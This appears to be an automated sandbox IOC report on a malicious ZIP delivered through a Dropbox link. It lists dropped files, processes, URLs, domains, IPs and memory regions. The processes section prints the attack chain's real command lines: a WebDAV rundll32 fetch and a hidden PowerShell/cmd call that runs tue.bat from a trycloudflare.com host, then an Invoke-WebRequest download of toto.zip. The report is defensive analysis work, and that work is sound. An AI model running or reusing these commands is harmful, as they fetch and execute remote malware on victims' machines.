IOC Report
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0

loading gif

Files

File Path
Type
Category
Malicious
C:\Users\user\Downloads\BestellungVRG020002.zip (copy)
Zip archive data, at least v1.0 to extract, compression method=store
dropped
malicious
C:\Users\user\Downloads\toto.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
malicious
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5788
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\MSI4f600.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka0uob4e.cto.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmadkynu.1ms.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2eu0te0.vxu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzzfzdv0.0nx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 04-17-18-363.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\03cadd97-da11-48f9-a9e0-e4ea0ea14d23.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\7e8a73e8-c68e-4dee-bba4-7d718f4cc8f5.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\b72b951e-990d-45c7-9fa0-88d4c9dcbde5.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\ff734dff-738b-4434-b791-19956e0299ef.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
dropped
C:\Users\user\Downloads\50e90ad8-c7e3-4c84-813c-786d849f4ee1.tmp
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\user\Downloads\BestellungVRG020002.zip.crdownload (copy)
Zip archive data, at least v1.0 to extract, compression method=store
dropped
Chrome Cache Entry: 180
Zip archive data, at least v1.0 to extract, compression method=store
downloaded
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 51 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0"
malicious
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
malicious
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
C:\Windows\System32\timeout.exe
timeout /t 5
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
malicious
https://retailer-indicators-resume-key.trycloudfla
unknown
malicious
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
104.16.230.132
malicious
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
104.16.230.132
malicious
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
104.16.231.132
malicious
https://retailer-indicators-resume-key.trycloudflare.com
unknown
malicious
https://theme-crack-emissions-perspectives.trycloudflare.com/
unknown
malicious
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat4
unknown
http://nuget.org/NuGet.exe
unknown
http://x1.i.lencr.org/
unknown
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
162.125.66.15
https://theme-crack-emissions-perspectives.trycloudflare.com/C:
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkC:
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batC:
unknown
https://go.micro
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnks=C:
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip&
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/OT
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip;
unknown
https://github.com/Pester/Pester
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkL
unknown
http://retailer-indicators-resume-key.trycloudflare.com
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkrw
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkq
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/#
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipWindows##
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipO
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk:
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipxit
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/ll
unknown
https://aka.ms/pscore68
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISION
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/55theme-crack-emissions-perspectives.tr
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISIONJ
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipX
unknown
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batq
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
retailer-indicators-resume-key.trycloudflare.com
104.16.231.132
malicious
bg.microsoft.map.fastly.net
199.232.210.172
edge-block-www-env.dropbox-dns.com
162.125.66.15
www.google.com
142.250.185.228
x1.i.lencr.org
unknown
dl.dropboxusercontent.com
unknown

IPs

IP
Domain
Country
Malicious
192.168.2.17
unknown
unknown
malicious
104.16.231.132
retailer-indicators-resume-key.trycloudflare.com
United States
malicious
142.250.185.228
www.google.com
United States
192.168.2.4
unknown
unknown
162.125.66.15
edge-block-www-env.dropbox-dns.com
United States
239.255.255.250
unknown
Reserved
96.7.168.138
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
13E37899000
trusted library allocation
page read and write
13E383EF000
trusted library allocation
page read and write
13E4ED50000
heap
page read and write
13E3830C000
trusted library allocation
page read and write
13E3825C000
trusted library allocation
page read and write
13E384E1000
trusted library allocation
page read and write
13E3872E000
trusted library allocation
page read and write
13E38847000
trusted library allocation
page read and write
13E38740000
trusted library allocation
page read and write
13E3883E000
trusted library allocation
page read and write
13E37389000
trusted library allocation
page read and write
AD0627E000
stack
page read and write
13E38D85000
trusted library allocation
page read and write
7FF9BFAF0000
trusted library allocation
page read and write
1EC8FB30000
heap
page read and write
13E34C30000
heap
page readonly
13E38AB5000
trusted library allocation
page read and write
13E37887000
trusted library allocation
page read and write
13E38A7C000
trusted library allocation
page read and write
13E4EBC1000
heap
page read and write
13E38327000
trusted library allocation
page read and write
13E38612000
trusted library allocation
page read and write
13E38D8E000
trusted library allocation
page read and write
13E38C5A000
trusted library allocation
page read and write
25D62B1B000
heap
page read and write
41F07FD000
stack
page read and write
13E3884A000
trusted library allocation
page read and write
41F033E000
stack
page read and write
6FFB78C000
stack
page read and write
AD060FE000
stack
page read and write
13E4F84E000
heap
page read and write
13E37529000
trusted library allocation
page read and write
13E365D7000
heap
page execute and read and write
41F08FE000
stack
page read and write
7FF9BFE83000
trusted library allocation
page read and write
13E37574000
trusted library allocation
page read and write
13E37541000
trusted library allocation
page read and write
13E38969000
trusted library allocation
page read and write
13E38B5C000
trusted library allocation
page read and write
13E34CD4000
heap
page read and write
13E46D58000
trusted library allocation
page read and write
20B53778000
heap
page read and write
13E38C87000
trusted library allocation
page read and write
13E4EBC5000
heap
page read and write
13E378E1000
trusted library allocation
page read and write
13E34B50000
heap
page read and write
1EC8FB50000
heap
page read and write
13E38621000
trusted library allocation
page read and write
13E3753E000
trusted library allocation
page read and write
7FF9BFBD0000
trusted library allocation
page read and write
13E378D5000
trusted library allocation
page read and write
41F02B8000
stack
page read and write
13E37395000
trusted library allocation
page read and write
7FF9BF52D000
trusted library allocation
page execute and read and write
7FF9BF9C0000
trusted library allocation
page read and write
13E383F2000
trusted library allocation
page read and write
13E38B71000
trusted library allocation
page read and write
13E38AB2000
trusted library allocation
page read and write
13E3832A000
trusted library allocation
page read and write
13E36A12000
heap
page read and write
7FF9BFDC0000
trusted library allocation
page execute and read and write
7FF9BF73B000
trusted library allocation
page read and write
13E38889000
trusted library allocation
page read and write
7FF9BF830000
trusted library allocation
page read and write
41F067E000
stack
page read and write
13E38719000
trusted library allocation
page read and write
7FF9BFC50000
trusted library allocation
page read and write
7FF9BFDB0000
trusted library allocation
page read and write
7FF9BF523000
trusted library allocation
page execute and read and write
7FF9BFD70000
trusted library allocation
page read and write
7FF9BF7C0000
trusted library allocation
page read and write
20B53960000
heap
page read and write
13E38978000
trusted library allocation
page read and write
13E38C54000
trusted library allocation
page read and write
13E3756E000
trusted library allocation
page read and write
13E38259000
trusted library allocation
page read and write
13E38999000
trusted library allocation
page read and write
7FF9BFB90000
trusted library allocation
page read and write
20686710000
heap
page read and write
AD061FE000
stack
page read and write
13E3851A000
trusted library allocation
page read and write
20686810000
heap
page read and write
13E38618000
trusted library allocation
page read and write
AB3057D000
stack
page read and write
13E366C4000
heap
page read and write
13E38975000
trusted library allocation
page read and write
13E38C78000
trusted library allocation
page read and write
13E3736E000
trusted library allocation
page read and write
13E3897E000
trusted library allocation
page read and write
13E3861E000
trusted library allocation
page read and write
13E38B68000
trusted library allocation
page read and write
7FF9BFE6D000
trusted library allocation
page read and write
13E38874000
trusted library allocation
page read and write
7FF9BF7B5000
trusted library allocation
page read and write
18BBB817000
heap
page read and write
13E3882F000
trusted library allocation
page read and write
13E36563000
trusted library allocation
page read and write
13E38C6C000
trusted library allocation
page read and write
13E37720000
trusted library allocation
page read and write
25D62B0E000
heap
page read and write
7FF9BFA90000
trusted library allocation
page read and write
13E36B90000
heap
page execute and read and write
18BBB780000
heap
page read and write
13E36520000
trusted library allocation
page read and write
13E38D70000
trusted library allocation
page read and write
13E38508000
trusted library allocation
page read and write
25D62B26000
heap
page read and write
223E3B60000
heap
page read and write
13E38505000
trusted library allocation
page read and write
13E3888C000
trusted library allocation
page read and write
7FF9BF840000
trusted library allocation
page execute and read and write
7B59FE000
stack
page read and write
7FF9BF7E0000
trusted library allocation
page read and write
13E38615000
trusted library allocation
page read and write
7B6D8A000
stack
page read and write
20686480000
heap
page read and write
7FF9BF950000
trusted library allocation
page read and write
7FF9BFEB0000
trusted library allocation
page read and write
13E38C5D000
trusted library allocation
page read and write
13E37562000
trusted library allocation
page read and write
13E38C7E000
trusted library allocation
page read and write
7FF9BFD20000
trusted library allocation
page read and write
223E5524000
heap
page read and write
28904A63000
heap
page read and write
7FF9BF53B000
trusted library allocation
page read and write
13E38960000
trusted library allocation
page read and write
6FFBAFF000
stack
page read and write
13E3824D000
trusted library allocation
page read and write
25D62B5C000
heap
page read and write
13E4EEB0000
heap
page read and write
7FF9BF763000
trusted library allocation
page read and write
13E3862D000
trusted library allocation
page read and write
7B597E000
stack
page read and write
13E3885C000
trusted library allocation
page read and write
13E38511000
trusted library allocation
page read and write
13E3752C000
trusted library allocation
page read and write
25D62D04000
heap
page read and write
C140C7E000
stack
page read and write
13E4F8CB000
heap
page read and write
20B537CB000
heap
page read and write
7FF9BFD30000
trusted library allocation
page read and write
13E38D82000
trusted library allocation
page read and write
13E38737000
trusted library allocation
page read and write
20686528000
heap
page read and write
13E384ED000
trusted library allocation
page read and write
1EC91620000
heap
page read and write
AD05D88000
stack
page read and write
1EC8FF05000
heap
page read and write
25D62B52000
heap
page read and write
13E36F50000
trusted library allocation
page read and write
25D62B03000
heap
page read and write
13E373A7000
trusted library allocation
page read and write
13E38636000
trusted library allocation
page read and write
13E38871000
trusted library allocation
page read and write
7FF9BFED0000
trusted library allocation
page read and write
13E38AB8000
trusted library allocation
page read and write
25D62B75000
heap
page read and write
13E4EBAF000
heap
page read and write
13E38D9D000
trusted library allocation
page read and write
13E365E0000
heap
page read and write
223E3B71000
heap
page read and write
13E3824A000
trusted library allocation
page read and write
13E378AE000
trusted library allocation
page read and write
7B5AFD000
stack
page read and write
13E34A70000
heap
page read and write
13E3832D000
trusted library allocation
page read and write
13E38A94000
trusted library allocation
page read and write
25D62B0A000
heap
page read and write
13E38868000
trusted library allocation
page read and write
13E378C3000
trusted library allocation
page read and write
AB3037E000
stack
page read and write
D798CFE000
stack
page read and write
13E38520000
trusted library allocation
page read and write
13E4F800000
heap
page read and write
6FFBA7E000
stack
page read and write
7FF9BFBC0000
trusted library allocation
page read and write
13E37532000
trusted library allocation
page read and write
13E38312000
trusted library allocation
page read and write
13E38190000
trusted library allocation
page read and write
25D62B75000
heap
page read and write
7FF9BFC40000
trusted library allocation
page read and write
13E46BA9000
trusted library allocation
page read and write
13E383E0000
trusted library allocation
page read and write
7FF9BFA60000
trusted library allocation
page read and write
13E38AA0000
trusted library allocation
page read and write
7FF9BFA10000
trusted library allocation
page read and write
13E3787B000
trusted library allocation
page read and write
13E38268000
trusted library allocation
page read and write
25D62B3E000
heap
page read and write
13E3772C000
trusted library allocation
page read and write
13E3873D000
trusted library allocation
page read and write
13E34C94000
heap
page read and write
13E373A4000
trusted library allocation
page read and write
7FF9BFD90000
trusted library allocation
page read and write
13E38315000
trusted library allocation
page read and write
13E384DB000
trusted library allocation
page read and write
13E3739B000
trusted library allocation
page read and write
28904A3C000
heap
page read and write
13E376D5000
trusted library allocation
page read and write
13E3887A000
trusted library allocation
page read and write
13E34BF0000
trusted library section
page read and write
D798DFE000
stack
page read and write
25D62B40000
heap
page read and write
13E38330000
trusted library allocation
page read and write
7FF9BFE7A000
trusted library allocation
page read and write
13E37723000
trusted library allocation
page read and write
7FF9BF7AD000
trusted library allocation
page read and write
7FF9BF6C0000
trusted library allocation
page read and write
7FF9BFE80000
trusted library allocation
page read and write
13E3873A000
trusted library allocation
page read and write
13E38856000
trusted library allocation
page read and write
13E384E7000
trusted library allocation
page read and write
206864B0000
heap
page read and write
7FF9BFA20000
trusted library allocation
page read and write
C140AFE000
stack
page read and write
13E37705000
trusted library allocation
page read and write
25D62B53000
heap
page read and write
13E381B0000
trusted library allocation
page read and write
13E3851D000
trusted library allocation
page read and write
7FF9BFEA0000
trusted library allocation
page read and write
7B6BCD000
stack
page read and write
13E34CAE000
heap
page read and write
13E3885F000
trusted library allocation
page read and write
7FF9BF6D0000
trusted library allocation
page read and write
2068659F000
heap
page read and write
7FF9BFD00000
trusted library allocation
page read and write
7FF9BF7D0000
trusted library allocation
page read and write
7B5EFE000
stack
page read and write
13E38C81000
trusted library allocation
page read and write
7FF9BF5D6000
trusted library allocation
page read and write
13E38877000
trusted library allocation
page read and write
7FF9BF5D0000
trusted library allocation
page read and write
25D62B4A000
heap
page read and write
13E378CF000
trusted library allocation
page read and write
13E38A82000
trusted library allocation
page read and write
13E3897B000
trusted library allocation
page read and write
25D62B6A000
heap
page read and write
13E38A9A000
trusted library allocation
page read and write
13E38265000
trusted library allocation
page read and write
7FF9BFDB5000
trusted library allocation
page read and write
13E378BD000
trusted library allocation
page read and write
13E38996000
trusted library allocation
page read and write
13E366C6000
heap
page read and write
13E378DB000
trusted library allocation
page read and write
7FF9BF800000
trusted library allocation
page read and write
13E3739E000
trusted library allocation
page read and write
13E38D97000
trusted library allocation
page read and write
7FF9BF980000
